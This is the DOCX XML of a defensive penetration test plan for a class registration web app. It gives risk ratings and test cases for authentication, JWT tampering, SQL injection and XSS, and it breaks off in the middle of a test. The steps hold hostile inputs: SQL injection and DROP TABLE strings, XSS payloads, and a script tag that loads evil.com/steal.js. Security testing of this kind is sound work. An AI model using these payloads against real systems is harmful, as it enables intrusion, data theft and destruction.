            <w:tcW w:type="dxa" w:w="624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IP hash bypass, raw PII logging, consent bypass, deletion capability verification.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Reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="62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Document all findings with evidence, severity, and remediation recommendations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Risk Rating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Risk Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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CVSS Approx.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Required Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFC7C7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>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9.0 – 10.0</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Immediate business impact, data breach, system takeover</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Fix before go-live / immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFE0C0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>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7.0 – 8.9</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Significant data or functional impact</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Fix within 48 hours of finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFF3CD" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>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4.0 – 6.9</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Limited impact, requires chaining with other issues</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Fix within 2 weeks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8F5E9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>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0.1 – 3.9</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Informational, hardening recommended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Fix within next sprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4.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
              <w:bottom w:val="single" w:color="E67E22" w:sz="1"/>
              <w:right w:val="single" w:color="E67E22" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFF3CD" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="7D5A00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠  Execute all test cases on the staging environment only unless written production approval has been obtained. Reset the database seed after each destructive test.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80"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">4.1  Authentication &amp; Session Management</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PT-AUTH-001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Admin Login Brute Force Protection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Auth Module — FR-1, FR-2, SRS v1.0 §5.1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repeated failed login attempts to /api/auth/login are rate-limited and do not enumerate whether an email address exists in the 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Navigate to /admin/login.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Submit 10 consecutive failed login attempts with the correct email but wrong password.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Observe HTTP responses — check if error message distinguishes 'wrong email' from 'wrong password'.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Attempt 50 rapid requests using Burp Suite Intruder with a password wordlist.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Check if account lockout or CAPTCHA is triggered after N attempts.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify rate limiting headers are present (Retry-After, X-RateLimit-*).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After 5–10 failed attempts, subsequent requests must return HTTP 429 Too Many Requests. Error messages must be generic ('Invalid credentials') regardless of which field is wrong. No lockout bypass via IP rotation should work without rate-limit reset.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Intruder, OWASP ZAP, curl</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PT-AUTH-002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JWT Token Tampering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Auth Module — FR-3, FR-4, SRS v1.0 §5.1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JWT tokens cannot be forged, tampered with, or used after expiry to gain admin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Log in as admin and capture the JWT token from the response or cookie.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Decode the token payload (base64) and modify the 'role' or 'sub' field.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Re-encode and re-sign with algorithm 'none' (alg:none attack).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Send the modified token to a protected admin endpoint (e.g., GET /api/admin/classes).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Attempt to use an expired token after the expiry window has passed.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Attempt to use a token from a different user session.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tampered or expired tokens must be rejected with HTTP 401 Unauthorized. The 'alg:none' attack must fail. No admin resource must be accessible without a valid, server-verified token.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jwt_tool (ticarpi/jwt_tool), Postman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PT-AUTH-003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Unauthorised Admin Route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Auth Module — FR-3, FR-4 / All Admin APIs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all /admin/* routes and /api/admin/* endpoints reject unauthenticated requests and redirect correctly.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Without any session, navigate directly to /admin/classes in the browser.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Without any session, send GET /api/admin/badges via Postman.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Send requests with a valid public-user session (non-admin) to admin API endpoints.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test all admin API endpoints listed in SRS §7 and CR-01 through CR-05.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Attempt CORS bypass by spoofing Origin header from an external domain.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unauthenticated requests to /admin/* must redirect to /admin/login (HTTP 302). All unauthenticated API requests must return HTTP 401. CORS policy must reject cross-origin requests from unlisted domains.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curl, Postman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PT-AUTH-004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Session Fixation and Token Replay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Auth Module — NextAuth.js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session tokens are rotated on login/logout and cannot be replayed.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Capture the session token before login.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Log in and check whether the session token changes (rotation test).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Log out and attempt to reuse the previous session token on a protected endpoint.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Capture a valid session token and attempt to use it from a different IP/User-Agent.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Session token must change on successful login (rotation). Logged-out tokens must return HTTP 401. Session should not be transferable across significantly different client contexts (IP/UA mismatch should trigger re-authentication or at minimum be logged).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browser DevTools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180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">4.2  Injection Attacks</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PT-INJ-001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SQL Injection — Student Registration Form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Student Reg — FR-12 to FR-18, SRS §5.3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all inputs on the /join/{join_code} registration form are parameterised and immune to SQL injection.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Navigate to a valid /join/{join_code} URL.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">In the 'Full Name' field, enter: ' OR 1=1 --</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">In the 'Email' field, enter: test@test.com' OR '1'='1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">In the 'Phone' field, enter: 1'; DROP TABLE registrations; --</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Submit the form and observe the server response.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Use sqlmap against POST /api/join/{join_code} with all parameters.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test the join_code URL parameter itself: /join/' OR 1=1 --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inputs must be rejected or sanitised. No SQL errors must appear in responses. Database must remain intact. HTTP 400 or 422 must be returned for invalid inputs. Prisma ORM's parameterised queries must prevent any injection.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sqlmap, Burp Suite, manual testing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PT-INJ-002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SQL Injection — Admin Search &amp; Filter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Reg. Mgmt — FR-19, FR-20, SRS §5.4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admin search, filter, and ordering parameters in registration management endpoints do not allow SQL injection.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Authenticate as admin.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Send GET /api/classes/{id}/registrations?search=' OR 1=1 --</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test ordering parameters: ?orderBy=name; DROP TABLE--</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test date range filters: ?from=2024-01-01' OR '1'='1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Run sqlmap against authenticated admin API endpoints.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parameterised queries via Prisma ORM must prevent injection. Unrecognised query parameters must be ignored or rejected. No database errors must be returned in API responses.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sqlmap (with auth cookie), Burp Suite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PT-INJ-003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Cross-Site Scripting (XSS) — Public Profile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Public Profile — FR-23 to FR-26, SRS §5.5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all admin-managed text fields rendered on public profile pages are properly escaped to prevent stored XSS.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As admin, update the 'Headline' field to: &lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Update the 'Biography' field to: &lt;img src=x onerror=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Update a class 'Notes' field to: &lt;svg onload=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Navigate to the public profile page and inspect rendered HTML.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Check that Next.js server-side rendering escapes all outputs correctly.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test all text fields that appear on public pages.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No script execution must occur. All user-controlled content must be HTML-escaped in output. Browser developer console must show no XSS alerts. React's default JSX escaping should prevent this, but verify custom dangerouslySetInnerHTML usage is absent.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OWASP ZAP, manual browser testing, DOM Inspector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PT-INJ-004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XSS — Badge Embed Code Injection (CR-01)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CR-01 — FR-31, Security §7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Credly embed code parsing rejects raw &lt;script&gt; tags and only stores allowed attributes.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As admin, paste the following into the badge embed code field: &lt;script src='https://evil.com/steal.js'&gt;&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Paste: &lt;iframe src='javascript:alert(1)' data-share-badge-id='fake'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Paste a valid embed code but modify the data-share-badge-host to point to https://attacker.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify what is stored in the database (only allowed fields: badge ID, host, dimensions).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
